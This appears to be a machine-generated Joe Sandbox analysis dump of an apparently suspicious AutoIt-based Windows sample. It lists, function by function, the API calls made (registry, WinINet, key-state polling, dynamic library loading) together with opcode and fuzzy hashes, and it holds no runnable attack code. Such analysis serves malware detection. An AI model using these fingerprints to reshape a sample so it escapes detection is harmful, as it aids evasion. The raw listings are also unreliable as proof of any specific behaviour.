                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: Variant$ClearInit$BuffCharCopyUpper
                            • String ID: AUTOIT.ERROR$Incorrect Parameter format
                            • API String ID: 4237274167-1221869570
                            • Opcode ID: 7d562a2efa3951c954f796f150478a0cf9103dc26e14529dff26d49c257837d6
                            • Instruction ID: 09bfb9589f44b9a599b71da65665c70a380146a76f10f8ef93e4b4c7dd146608
                            • Opcode Fuzzy Hash: 7d562a2efa3951c954f796f150478a0cf9103dc26e14529dff26d49c257837d6
                            • Instruction Fuzzy Hash: 86914A74608301DFCB10EF24C485A9ABBF4BF89714F14496EF89A9B352DB31E945CB62
                            APIs
                            • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 000C10B8
                            • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 000C10EE
                            • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 000C10FF
                            • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 000C1181
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: ErrorMode$AddressCreateInstanceProc
                            • String ID: DllGetClassObject
                            • API String ID: 753597075-1075368562
                            • Opcode ID: 6789ba0e269f964d11e3956d50aca94afe022f49665f7c2fbf996abcd9d9ef58
                            • Instruction ID: 3acbb2bb095dd89adec72309c1c1c8f5fa0741d4daf588b3043abc32e1d626e8
                            • Opcode Fuzzy Hash: 6789ba0e269f964d11e3956d50aca94afe022f49665f7c2fbf996abcd9d9ef58
                            • Instruction Fuzzy Hash: D5413871600204AFDB15CF54C884FEE7BA9EF46354F1880ADEE099F246D7B5D944CBA0
                            APIs
                            • _memset.LIBCMT ref: 000C5A93
                            • GetMenuItemInfoW.USER32 ref: 000C5AAF
                            • DeleteMenu.USER32(00000004,00000007,00000000), ref: 000C5AF5
                            • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,001418F0,00000000), ref: 000C5B3E
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: Menu$Delete$InfoItem_memset
                            • String ID: 0
                            • API String ID: 1173514356-4108050209
                            • Opcode ID: cc6f4c21acf2c26ab1e7cc69514afac2626b1bb443c050396bcbb1d38c2c9f61
                            • Instruction ID: 89c88dae353f40a7ce4387ed06e2a15af45c5e36093ffe83705364664dbc6ef9
                            • Opcode Fuzzy Hash: cc6f4c21acf2c26ab1e7cc69514afac2626b1bb443c050396bcbb1d38c2c9f61
                            • Instruction Fuzzy Hash: E1418F752047019FDB249F28DC84F6EBBE4EF89315F04461DF9A59B2D2DB70A880CB62
                            APIs
                            • CharLowerBuffW.USER32(?,?,?,?), ref: 000E0478
                              • Part of subcall function 00087F40: _memmove.LIBCMT ref: 00087F8F
                              • Part of subcall function 0008A2FB: _memmove.LIBCMT ref: 0008A33D
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: _memmove$BuffCharLower
                            • String ID: cdecl$none$stdcall$winapi
                            • API String ID: 2411302734-567219261
                            • Opcode ID: c2121e20d859172ce7bf9b270eb79212d5c210a3079256f96ae33d97eb036de0
                            • Instruction ID: f429dbe7f507cd75919eb8bd699532742015f65473f076265b4cd7cbf1b044e4
                            • Opcode Fuzzy Hash: c2121e20d859172ce7bf9b270eb79212d5c210a3079256f96ae33d97eb036de0
                            • Instruction Fuzzy Hash: C7318D71500A1AAFCF04EF59C940AEEB3B5FF15350B108A2AE462A72D2DBB1E945CF40
                            APIs
                              • Part of subcall function 0008CAEE: _memmove.LIBCMT ref: 0008CB2F
                            • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 000BC684
                            • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 000BC697
                            • SendMessageW.USER32(?,00000189,?,00000000), ref: 000BC6C7
                              • Part of subcall function 00087E53: _memmove.LIBCMT ref: 00087EB9
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: MessageSend$_memmove
                            • String ID: ComboBox$ListBox
                            • API String ID: 458670788-1403004172
                            • Opcode ID: 1ca3700d9fa89f5ddf7c6b0b1ce60edf1069da4fb5f459e5f8bdd4e5dc13df58
                            • Instruction ID: c30199dd9b22d182635b7938a5d96c8ee64cc9a559d76c036d778c519e1b7454
                            • Opcode Fuzzy Hash: 1ca3700d9fa89f5ddf7c6b0b1ce60edf1069da4fb5f459e5f8bdd4e5dc13df58
                            • Instruction Fuzzy Hash: 84210271900108BFEB18ABA4DC86DFFB7B8EF06314B104129F466E31E2DB744D4A9B20
                            APIs
                            • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 000D4A60
                            • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 000D4A86
                            • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 000D4AB6
                            • InternetCloseHandle.WININET(00000000), ref: 000D4AFD
                              • Part of subcall function 000D56A9: GetLastError.KERNEL32(?,?,000D4A2B,00000000,00000000,00000001), ref: 000D56BE
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: HttpInternet$CloseErrorHandleInfoLastOpenQueryRequestSend
                            • String ID:
                            • API String ID: 1951874230-3916222277
                            • Opcode ID: 0233fbf03ebf1f3d13427f8599512820f83f39f9a53b4fb298ce2cfc1bdf5227
                            • Instruction ID: 43323e624893d5ba955299b66752450aafd2b3a017871555b0709759b4ee7b25
                            • Opcode Fuzzy Hash: 0233fbf03ebf1f3d13427f8599512820f83f39f9a53b4fb298ce2cfc1bdf5227
                            • Instruction Fuzzy Hash: 5321BEB5640308BFEB21DFA89C85EBFB6FCEB49748F10402BF545A6240EA708D058772
                            APIs
                              • Part of subcall function 0009C619: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0009C657
                              • Part of subcall function 0009C619: GetStockObject.GDI32(00000011), ref: 0009C66B
                              • Part of subcall function 0009C619: SendMessageW.USER32(00000000,00000030,00000000), ref: 0009C675
                            • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 000E8F69
                            • LoadLibraryW.KERNEL32(?), ref: 000E8F70
                            • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 000E8F85
                            • DestroyWindow.USER32(?), ref: 000E8F8D
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                            • String ID: SysAnimate32
                            • API String ID: 4146253029-1011021900
                            • Opcode ID: 887b4bd5958cae3e4e05c5713e7994942ecb77c103961b93b03f1ef25b25adb8
                            • Instruction ID: abd25b72a294fbda672f3cfe94460fc87c268f5793f658e2ab298797340298e7
                            • Opcode Fuzzy Hash: 887b4bd5958cae3e4e05c5713e7994942ecb77c103961b93b03f1ef25b25adb8
                            • Instruction Fuzzy Hash: F4219F71200245AFEF104EA6EC44FBB37EAEB49324F108624FA58A7191CB71DC909760
                            APIs
                            • SetErrorMode.KERNEL32(00000001), ref: 000CE392
                            • GetVolumeInformationW.KERNEL32(?,?,00000104,?,00000000,00000000,00000000,00000000), ref: 000CE3E6
                            • __swprintf.LIBCMT ref: 000CE3FF
                            • SetErrorMode.KERNEL32(00000000,00000001,00000000,0011DBF0), ref: 000CE43D
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: ErrorMode$InformationVolume__swprintf
                            • String ID: %lu
                            • API String ID: 3164766367-685833217
                            • Opcode ID: 5d1fb0a5c9421a7c4072800a5373ecd2088dda509fec1c88da88bf02aceb7152
                            • Instruction ID: fdc44031f844dba3586d9e9b769e91d9095a3d6db1dac67a7566222be6292eab
                            • Opcode Fuzzy Hash: 5d1fb0a5c9421a7c4072800a5373ecd2088dda509fec1c88da88bf02aceb7152
                            • Instruction Fuzzy Hash: 21218035A40108AFCB10EFA4DC85EEEB7B8EF49715F104069F509D7252D771DA41CB61
                            APIs
                              • Part of subcall function 00087E53: _memmove.LIBCMT ref: 00087EB9
                              • Part of subcall function 000BD623: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 000BD640
                              • Part of subcall function 000BD623: GetWindowThreadProcessId.USER32(?,00000000), ref: 000BD653
                              • Part of subcall function 000BD623: GetCurrentThreadId.KERNEL32 ref: 000BD65A
                              • Part of subcall function 000BD623: AttachThreadInput.USER32(00000000), ref: 000BD661
                            • GetFocus.USER32 ref: 000BD7FB
                              • Part of subcall function 000BD66C: GetParent.USER32(?), ref: 000BD67A
                            • GetClassNameW.USER32(?,?,00000100), ref: 000BD844
                            • EnumChildWindows.USER32(?,000BD8BA), ref: 000BD86C
                            • __swprintf.LIBCMT ref: 000BD886
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows__swprintf_memmove
                            • String ID: %s%d
                            • API String ID: 1941087503-1110647743
                            • Opcode ID: 891a8c35901076f37621d86b25ab7959697c22addbe0a915275fbfa9a7352f60
                            • Instruction ID: 705ce3771ea37c06da022040e3a2a8f54dfa598712f3b3ab632086ab9548d674
                            • Opcode Fuzzy Hash: 891a8c35901076f37621d86b25ab7959697c22addbe0a915275fbfa9a7352f60
                            • Instruction Fuzzy Hash: 9F1184755002056BDF117F90DC85FEAB769AB48705F0040B6FE0DAA147EBB59945CB70
                            APIs
                            • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 000E18E4
                            • GetProcessIoCounters.KERNEL32(00000000,?), ref: 000E1917
                            • GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 000E1A3A
                            • CloseHandle.KERNEL32(?), ref: 000E1AB0
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: Process$CloseCountersHandleInfoMemoryOpen
                            • String ID:
                            • API String ID: 2364364464-0
                            • Opcode ID: bb6ed47a57efc4dd146c27d2cc81a0b78c3fea74a6999f773ac7ac0473ddb967
                            • Instruction ID: 2a392de2dfd4c402ce8dc5ba0a6063e2be8af7e5dfaf95f786856675c938f570
                            • Opcode Fuzzy Hash: bb6ed47a57efc4dd146c27d2cc81a0b78c3fea74a6999f773ac7ac0473ddb967
                            • Instruction Fuzzy Hash: 54816370A40215AFDF10AF65C886BED7BF9AF48720F198059F905BF382D7B4E9409B91
                            APIs
                              • Part of subcall function 000884A6: __swprintf.LIBCMT ref: 000884E5
                              • Part of subcall function 000884A6: __itow.LIBCMT ref: 00088519
                            • LoadLibraryW.KERNEL32(?,00000004,?,?), ref: 000E05DF
                            • GetProcAddress.KERNEL32(00000000,?), ref: 000E066E
                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 000E068C
                            • GetProcAddress.KERNEL32(00000000,?), ref: 000E06D2
                            • FreeLibrary.KERNEL32(00000000,00000004), ref: 000E06EC
                              • Part of subcall function 0009F26B: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,000CAEA5,?,?,00000000,00000008), ref: 0009F282
                              • Part of subcall function 0009F26B: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,000CAEA5,?,?,00000000,00000008), ref: 0009F2A6
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad__itow__swprintf
                            • String ID:
                            • API String ID: 327935632-0
                            • Opcode ID: 3016487732d7d7dc07fb279ebbf2a29a1830be425f5c35a8c6705508a2e070e9
                            • Instruction ID: b9a76112ba8a73efd59f217f2cf54ff1adc465b340852249d95e1370fe7f954e
                            • Opcode Fuzzy Hash: 3016487732d7d7dc07fb279ebbf2a29a1830be425f5c35a8c6705508a2e070e9
                            • Instruction Fuzzy Hash: 50515B75A002459FCB00EFA8C890EEDB7F5FF58310B148066E995AB352DB70ED85CB50
                            APIs
                              • Part of subcall function 0008CAEE: _memmove.LIBCMT ref: 0008CB2F
                              • Part of subcall function 000E3AF7: CharUpperBuffW.USER32(?,?,?,?,?,?,?,000E2AA6,?,?), ref: 000E3B0E
                            • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 000E2DE0
                            • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 000E2E1F
                            • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 000E2E66
                            • RegCloseKey.ADVAPI32(?,?), ref: 000E2E92
                            • RegCloseKey.ADVAPI32(00000000), ref: 000E2E9F
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: Close$BuffCharConnectEnumOpenRegistryUpper_memmove
                            • String ID:
                            • API String ID: 3440857362-0
                            • Opcode ID: 8617ace84929ea0b5c980fbd655fad193f21f1c234792dfa4a721f4d09edb90e
                            • Instruction ID: fc83adb51bc39a1113fef7ac6ac9cb67cd7c059e0c36de1fe6a32670b63c67ee
                            • Opcode Fuzzy Hash: 8617ace84929ea0b5c980fbd655fad193f21f1c234792dfa4a721f4d09edb90e
                            • Instruction Fuzzy Hash: BA514C71208244AFD704EF64CC81EAEB7E9FF88314F04492EF595972A2DB71E945CB52
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 43a1002dd1bd0d6fec5a9b461c3ea2944f5773ac5438ff1521f51361ed8fab28
                            • Instruction ID: 3ee9258a04213bab57846a10f5d908c974bc95a8afe743b81d360f6e1677db0d
                            • Opcode Fuzzy Hash: 43a1002dd1bd0d6fec5a9b461c3ea2944f5773ac5438ff1521f51361ed8fab28
                            • Instruction Fuzzy Hash: 9B412436900284FFE724DB69CC49FA9BBB8EB09320F244251F959F72E1C772AD42D650
                            APIs
                            • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 000D17D4
                            • GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 000D17FD
                            • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 000D183C
                              • Part of subcall function 000884A6: __swprintf.LIBCMT ref: 000884E5
                              • Part of subcall function 000884A6: __itow.LIBCMT ref: 00088519
                            • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 000D1861
                            • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 000D1869
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
                            • String ID:
                            • API String ID: 1389676194-0
                            • Opcode ID: 696047e47afb592c73d55e649935661470b52697a8ed699b86a4024671eb3328
                            • Instruction ID: 92227876347b64965a1fd9d79c99e89a71853a1f9181655a3c8ee72d1a325bd1
                            • Opcode Fuzzy Hash: 696047e47afb592c73d55e649935661470b52697a8ed699b86a4024671eb3328
                            • Instruction Fuzzy Hash: FF411835A00215EFCB15EF64C981EADBBF5FF08310B1480A9E849AB362DB31ED41DB60
                            APIs
                            • GetCursorPos.USER32(000000FF), ref: 0009B749
                            • ScreenToClient.USER32(00000000,000000FF), ref: 0009B766
                            • GetAsyncKeyState.USER32(00000001), ref: 0009B78B
                            • GetAsyncKeyState.USER32(00000002), ref: 0009B799
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: AsyncState$ClientCursorScreen
                            • String ID:
                            • API String ID: 4210589936-0
                            • Opcode ID: 5564aa9478998ed12dd2b50697179ab5b0bb5a7bf3f688eca7e5fbd8f058e44f
                            • Instruction ID: d7fa129fa2d6161ecdb90703f5dc55d68daa475d4c271b6128d2b6a93abd0017
                            • Opcode Fuzzy Hash: 5564aa9478998ed12dd2b50697179ab5b0bb5a7bf3f688eca7e5fbd8f058e44f
                            • Instruction Fuzzy Hash: 50417F35508159FFDF259FA5D884AEDFBB4BB45730F204319F929962E0C730A990EB90
                            APIs
                            • GetWindowRect.USER32(?,?), ref: 000BC156
                            • PostMessageW.USER32(?,00000201,00000001), ref: 000BC200
                            • Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 000BC208
                            • PostMessageW.USER32(?,00000202,00000000), ref: 000BC216
                            • Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 000BC21E
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: MessagePostSleep$RectWindow
                            • String ID:
                            • API String ID: 3382505437-0
                            • Opcode ID: 34425ac0d49dbd642efc151ab55068fea583776cf35fcae0bc00985b3d2c24e5
                            • Instruction ID: 8352a22c560d406626b241fcff3add05dc88e8a13db3e40aa13085fad872096c
                            • Opcode Fuzzy Hash: 34425ac0d49dbd642efc151ab55068fea583776cf35fcae0bc00985b3d2c24e5
                            • Instruction Fuzzy Hash: 1531CCB1900219EBEB14CFA8DE4CADE3BB5EB05325F104629F821AB2D1C7B09944CB90
                            APIs
                            • IsWindowVisible.USER32(?), ref: 000BE9CD
                            • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 000BE9EA
                            • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 000BEA22
                            • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 000BEA48
                            • _wcsstr.LIBCMT ref: 000BEA52
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
                            • String ID:
                            • API String ID: 3902887630-0
                            • Opcode ID: 3358eeb9664162af1418d34708da282b0a7ad2d0eea1470a3aa8ae7c62ed8fa1
                            • Instruction ID: 6737452f6d058d9266bd4c761ad64fb0e00b49ddc158ba5c4ce638d39e9e8c6c
                            • Opcode Fuzzy Hash: 3358eeb9664162af1418d34708da282b0a7ad2d0eea1470a3aa8ae7c62ed8fa1
                            • Instruction Fuzzy Hash: 2F21F9712042447AEB659BA9EC45EFF7BECDF46750F108029F849CA191DEA1EC409651
                            APIs
                              • Part of subcall function 0009AF7D: GetWindowLongW.USER32(?,000000EB), ref: 0009AF8E
                            • GetWindowLongW.USER32(?,000000F0), ref: 000EDCC0
                            • SetWindowLongW.USER32(00000000,000000F0,00000001), ref: 000EDCE4
